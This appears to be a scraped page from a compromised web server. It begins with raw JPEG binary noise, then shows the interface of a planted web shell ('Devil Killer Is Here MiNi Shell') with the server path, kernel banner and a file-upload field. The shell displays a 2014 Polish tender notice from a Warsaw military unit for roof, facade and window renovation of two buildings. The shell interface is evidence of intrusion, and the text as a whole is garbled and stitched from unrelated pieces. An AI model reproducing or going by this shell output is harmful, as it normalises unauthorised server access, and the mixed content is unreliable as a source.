JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140120/12225-N-2014.html

<p class="kh_header"><b>Warszawa: Wykonanie remontu budynku 50 i budynku 51 oraz ciągu komunikacyjnego</b><br>
<b>Numer ogłoszenia: 12225 - 2014; data zamieszczenia: 20.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 4198 , ul. Żwirki i Wigury 1C, 00-909 Warszawa, woj. mazowieckie, tel. 022 6821316, faks 022 6821316.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1blot.sp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa 4198.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu budynku 50 i budynku 51 oraz ciągu komunikacyjnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS  PRZEDMIOTU  ZAMÓWIENIA
Opis przedmiotu zamówienia dotyczy  kompleksowego opisu prac remontowych oraz  odbioru robót  ogólnobudowlanych.
Zadanie nr 1 - Budynek 51 - wymiana pokrycia dachowego, remont elewacji i wejść do budynku oraz remont ciągu komunikacyjnego
Zadanie nr 2 - Budynek 50 - wymiana pokrycia dachowego, remont elewacji, wymiana stolarki okiennej, remont wejść i balustrad
1. Zakres prac budynków oraz ciągi komunikacyjne - chodniki wzdłuż  budynków nr 50,51 : Budynek nr 50: Remont dachu , wymiana istniejącej stolarki okiennej -drewnianej- na okna    z profili PCV, naprawa tynku przy elewacji i kominów wentylacyjnych wraz z malowaniem, wymiana instalacji odgromowej.                                                                                                  Budynek nr 51: Remont dachu, remont elewacji, wymiana instalacji odgromowej.
2. Opis budynków i ciągu komunikacyjnego:
Budynki nr 50,51 i ciąg komunikacyjny położone są w kompleksie wojskowym k-6077 w Warszawie  przy ul. Żwirki i Wigury 1C. 
OBOWIĄZKI INWESTORA
Inwestor przekazuje Wykonawcy dokumenty do wykonania przedmiotu zamówienia w postaci Przedmiaru do Kosztorysu  wraz z Opisem Przedmiotu Zamówienia.
Inwestor przekazuje plac budowy po zgłoszeniu Wykonawcy do wykonania zadania - wykonując protokół przekazania placu budowy, określający teren budowy, sposób i miejsce składowania materiałów, przechowywania sprzętu, transport pionowy materiałów i sposób jego oznakowania.
OBOWIĄZKI WYKONAWCY
Wykonawca przejmuje plac budowy, zabezpiecza i oznakowuje zgodnie z prawem budowlanym teren budowy oraz zaplecza technicznego. Wykonawca ponosi pełną odpowiedzialność za utrzymanie placu budowy oraz zaplecza technicznego do momentu odbioru końcowego robót i protokolarnego przekazania.
W miarę postępu robót plac budowy i zaplecza technicznego powinien być porządkowany, usuwane materiały z demontażu, zbędne materiały, sprzęt i zanieczyszczenia. Ze względu na wykonywanie robót na czynnych obiektach wykonawca zobowiązany jest zapewnić szczególną ochronę frontu robót i zapewnienie pełnego bezpieczeństwa użytkownikom budynku    
ZAKRES ROBÓT
Remont dachu w budynku nr 50 obejmuje: 
-rozbiórka pokrycia z papy - wywóz i utylizacja  
-rozebranie obróbek blacharskich murów ogniowych, okapów, kołnierzy, gzymsów  itp. 
-rozebranie rynien i rur spustowych
-wymiana murłaty pod  renajzy rynien  
-rozebranie izolacji dachu z płyt pilśniowych oraz rozkruszonej szlichty - wywiezienie 
-obróbki blacharskie zdać do magazynu JW. 4198 
-krycie papą termozgrzewalną -dwukrotnie- wraz z ociepleniem dachu płytami styropianowymi  obustronne obklejone papą   PS20SE  grub.12cm
-warstwy wyrównawcze pod ocieplenie ze styropianu na  zaprawy cementowej - 4cm
-obróbki blacharskie, pasy rynnowe również przy kominach -wydry- z blachy powlekanej 
-rynny dachowe , rury spustowe oraz zbiorniczki przy rynnach z blachy powlekanej 
-naprawa uszkodzonej powierzchni kominów oraz czapki 
-obróbek wywiewek kanalizacyjnych oraz założenie kratek w kominach wentylacyjnych
-wymiana instalacji odgromowej na dachu wraz ze  zwodami - wykonać pomiary
-zainstalować kominki wentylacyjne na połaci  dachu.    
Remont elewacji w budynku nr 50 obejmuje:
-przygotowanie starego podłoża pod docieplenie- oczyszczenie mechaniczne i zmycie       
-dwukrotne gruntowanie emulsją 
-wyprawa elewacyjna cienkowarstwowa z akrylowych tynków dekor o fakturze rustykalnej gr.3mm
-cokół wykonać z tynku mozaikowego  
-dwukrotne malowanie elewacji
-wymiana  opaski z płyt chodnikowych 35x35x6  wraz z obrzeżem betonowym  o wymiarach 100x 20x 6
-wymiana terakoty na schodach zewnętrznych na płyty betonowe - imitacja  terakoty  
Wymiana okien i drzwi w budynku nr 50 obejmuje
-wymiana okien - 87e szt.-
-obróbki - parapetów zewn.- z blachy  w kolorze brąz oraz obróbka glifów obustronnie
-dwukrotnie malowanie farbą olejną krat i siatek zewnętrznych 
-dwukrotnie malowanie farbą olejną daszek nad wyjściem 
-dwukrotnie malowanie farbą olejną drabiny włazowej na dach oraz osłony
-wymiana drzwi wejściowych  zewnętrzne z profili aluminiowych 
  Remont dachu w  budynku nr 51 obejmuje
-wymiana obróbek blacharskich murów ogniowych ,okapów, kołnierzy, gzymsów, pasy nadrynnowe i podrynnowe oraz  kominów na blachy proszkowo malowane 
-naprawa pokryć dachowych oraz położenie nowej warstwy papy termozgrzewalnej na ocieplenie dachu styropianem grubości 12 cm. 
-obróbek wywiewek kanalizacyjnych oraz założenie kratki w kominach wentylacyjnych 
-wymiana rynny i rur spustowych  z PCV na rynny i rur z blachy powlekanej 
-wymiana zbiorniczka przy rynnach
-uzupełnienie tynków w uszkodzonych kominów oraz jednokrotne malowanie
-uzupełnienie zbrojonych czapek kominowych z betonu - założenia kratek went.
-wymiana instalacji odgromowej na dachu wraz ze zwodami- wykonać pomiary
-miniowanie i malowanie dwukrotne drabiny stalowej - właz na dach
-zainstalować 
Remont elewacji w budynku nr 51 obejmuje:
-przygotowanie starego podłoża pod docieplenie - oczyszczenie mechaniczne i zmycie
-dwukrotne gruntowanie emulsją
-wyprawa elew. cienkowarstwowa z akrylowych tynków  dekor o fakturze rustykalnej gr.3mm
-cokół wykonać z tynku mozaikowego 
-dwukrotne malowanie elewacji - cokół 
-wymiana opaski z płyt chodnikowych jak przy bud.50
-dwukrotnie malowanie farbą olejną krat i siatek zewnętrznych 
-jednokrotnie malowanie farbą olejną parapetów zewnętrznych 
-dwukrotnie malowanie farbą olejną daszku nad wyjściem 
-uzupełnienie tynków przy gzymsach i elewacji 
-dwukrotnie malowanie elewacji
-wymiana terakoty na schodach zewn. jak przy bud.50
Remont ciągów komunikacyjnych przy bud. 50,51 obejmuje:
-wymiana nawierzchni ,rozebranie obrzeża 
-przygotowanie terenu  pod kostkę brukową
-ułożenia nowej kostki i obrzeży
-wymiana pokrywy żelbetowej i ramy studni      
WYMAGANIA  DOTYCZĄCE OKIEN Z PCV I DRZWI WEJŚCIOWYCH 
Wymiana stolarki okiennej na budynku 50 - uwaga zachować wygląd wizualny -poprzedniej
 stolarki okiennej 
Pomiary  dokonano w świetle ościeży i wynoszą:
OTWORY DRZWIOWE
- drzwi zewnętrzne z profili aluminiowych góra przeszklona, dół wypełniony w kolorze brąz.
- o wymiarach 1,45 X 2,60 - szt 1  - z naświetlem 
 OTWORY OKIENNE
-  okno zespolone PCV-dwudzielne , uchylno - rozwierne
-  o wym. 1,70 x 1,66  -  szt. 58 - symetryczne 
-  o wym. 1,70 x  1,51 - szt. 12
-  o wym. 1,71 x 0,54  -  szt. 11 - uchylne - WC 
-  o wym. 0,70 x 1,45  -  szt.   6
      Przed wykonaniem wymiany okien Wykonawca powinien dokonać własnego pomiaru. Strony otwierania i sposób montażu stron na etapie wykonawstwa w uzgodnieniu z Użytkownikiem i Inspektorem Nadzoru Budowlanego. Okna dostarczyć zgodnie z normą
-Instytutu Techniki Budowlanej na zgodność z normą PN-90-B-92210,
-Znak Budowlany,
WYMAGANIA DOTYCZĄCE POZOSTAŁYCH MATERIAŁÓW
Pozostałe materiały powinny posiadać dopuszczenie do obrotu i powszechnego stosowania w budownictwie opatrzone -znakiem budowlanym- na podstawie przepisów ogólnych Rozdział 4 - Znakowanie wyrobów -paragraf 9-l l - oraz powinny być zgodne z obowiązującymi normami, powinny posiadać odpowiednie atesty i świadectwa dopuszczenia do użycia oraz akceptację Inspektora Nadzoru.
Użyte materiały powinny posiadać dopuszczenie do obrotu i powszechnego stosowania w budownictwie opatrzone -znakiem budowlanym- na podstawie przepisów ogólnych Rozdział 4 - Znakowanie wyrobów -paragraf 9-l l-
WYMAGANIA DOTYCZĄCE SPRZĘTU
Elektronarzędzia  powszechnego użytku w robotach budowlanych typu wiertarka z wiertłami, wkrętaka z oprzyrządowaniem, mieszarki wypraw tynkarskich, klejów i farb oraz narzędzia osobiste jak poziomice, wiaderka, młotki, szpachle, szpachelki oraz pace.
Dobór sprzętu używany do wykonania robót przewidzianych w umowie powinien gwarantować dobrą jakość oraz powinien spełniać wszystkie warunki przestrzegania przepisów BHP.  
 SPOSÓB REALIZACJI ZAMÓWIENIA
1.Wykonawca ustala Kierownika Robót posiadającego przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie do bezpośredniego kontaktu z Zamawiającym.
2.Zamawiający wyznacza do realizacji zadania Inspektora Nadzoru oraz osobę do bezpośredniego kontaktu - Kierownika Zespołu Zabezpieczenia tel.22 6-821-108,
3.   Wykonawca zrealizuje roboty z własnych materiałów.	
4.  Ze względu na charakter budynku oraz kompleksu w którym się obiekty znajdują  materiały użyte do wykonania zadania mają być pierwszej jakości a jakość robót najwyższa. 
5.  Termin realizacji do 120 dni od daty podpisania umowy.
6. Wszystkie materiały powinny posiadać dopuszczenie do obrotu i powszechnego stosowania w budownictwie na podstawie przepisów ogólnych-Rozdział IV-znakowanie wyrobów - paragraf 9-11 -i opatrzone znakiem budowlanym.
 7.  Odpowiedzialność za jakość wykonywania wszystkich rodzajów robót wchodzących  w skład zadania w całości ponosi  Wykonawca.
 8. Materiały z demontażu tj. ościeżnice drzwiowe i skrzydła drzwiowe, podlegają przekazaniu na stan magazynu budowlanego przy ul. Żwirki i Wigury 1 C, budynek Nr 66 po uprzednim wykonaniu dokumentu Asygnaty Przychodowej w Dziale Księgowości Materiałowej  przy ul. Żwirki i Wigury 1 C, Budynek Nr 2, pok. Nr 4. 
 9.  Przekazaniu na stan magazynu budowlanego JW. 4198 nie podlegają    -   gruz , - które należy usunąć poza teren kompleksu.
  WARUNKI ODBIORU ROBÓT 
l. Wykonawca zobowiązany jest do zgłoszenia Zamawiającemu o gotowości do  końcowego odbioru prac najpóźniej w dniu zakończenia robót wg umowy.
2.   Zamawiający zobowiązany jest dokonać odbioru prac najpóźniej w ciągu 7 dni od daty zgłoszenia. 
3.  Najpóźniej w dniu odbioru robót Wykonawca zobowiązany jest dostarczyć atesty i aprobaty i zgodności na wszystkie użyte do wykonania zadania materiały, oraz zrealizowane dokumenty przychodowe -asygnaty- na materiały demontażowe.
4.Potwierdzeniem końcowego odbioru będzie Protokół Końcowego Odbioru Robót sporządzony przez przedstawicieli obu stron i zatwierdzony przez Zamawiającego.
KONTROLA  JAKOŚCI ROBÓT
Kontrola transportu, składowania, wykonania i obsadzenia ościeżnic oraz skrzydeł drzwiowych z profili aluminiowych - kontrola prawidłowości ruchu i szczelności skrzydeł drzwiowych, kontrola uszczelek
ODBIÓR 
Odbioru wykonania robót dokonuje się komisyjnie z udziałem z ramienia Zamawiającego - Inspektor Nadzoru wraz z - Kierownikiem Zespołu Zabezpieczenia. w obecności przedstawiciela Użytkownika, przy współudziale Wykonawcy, na podstawie wizji lokalnej. 
Odbiór prac polega na stwierdzeniu zgodności prac z dokumentacją kosztorysową oraz jakością użytych materiałów i jakością wykonania robót.
 Niezbędnym elementem dokonania odbioru robót jest dostarczenie przez Wykonawcę stosownych certyfikatów oraz zgodności na użyte materiały oraz okazanie przez Wykonawcę dokumentu Asygnaty Przychodowej, na przekazanie materiałów z demontażu do magazynu budowlanego SOI. 
Zakres robót uważa się za odebrany z chwilą wykonania Protokołu Końcowego Odbioru Robót - bez uwag i komisyjnego złożenia podpisów. 
GWARANCJA WYKONANIA
 Gwarancje na wykonane prace:
- odnośnie drzwi z profili z aluminium - trwałość montażu, na sztywność, niezawodność okuć, na odkształcenia profili  - minimum 120 miesięcy,
- na trwałość wykonanych tynków zewnętrznych i wewnętrznych - 36 miesięcy,
 - na trwałość wykonanych prac malarskich - 36 miesięcy.

Szczegółowy Opis przedmiotu zamówienia i SIWZ, znajduje się na stronie internetowej Zamawiającego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.44.30.00-4, 45.26.19.10-6, 45.26.19.20-9, 45.31.10.00-8, 45.22.33.00-9, 45.42.11.32-8, 45.26.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z późn. zm.) - 
2.  Wykaz osób (pracowników), które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz o podstawie do dysponowania tymi osobami 
3. Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający wymaga co najmniej dwóch dowodów wykonania przedmiotu zamówienia
4. Oświadczenie o braku podstaw do wykluczenia 
5. Świadectwo Bezpieczeństwa Przemysłowego co najmniej III stopnia, zgodnie   z ustawą  z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2010 r., nr 182, poz. 1228) oraz Instrukcją Bezpieczeństwa Przemysłowego,
 6. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie   w zakresie art. 24 ust.1 pkt.2 ustawy.
7.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
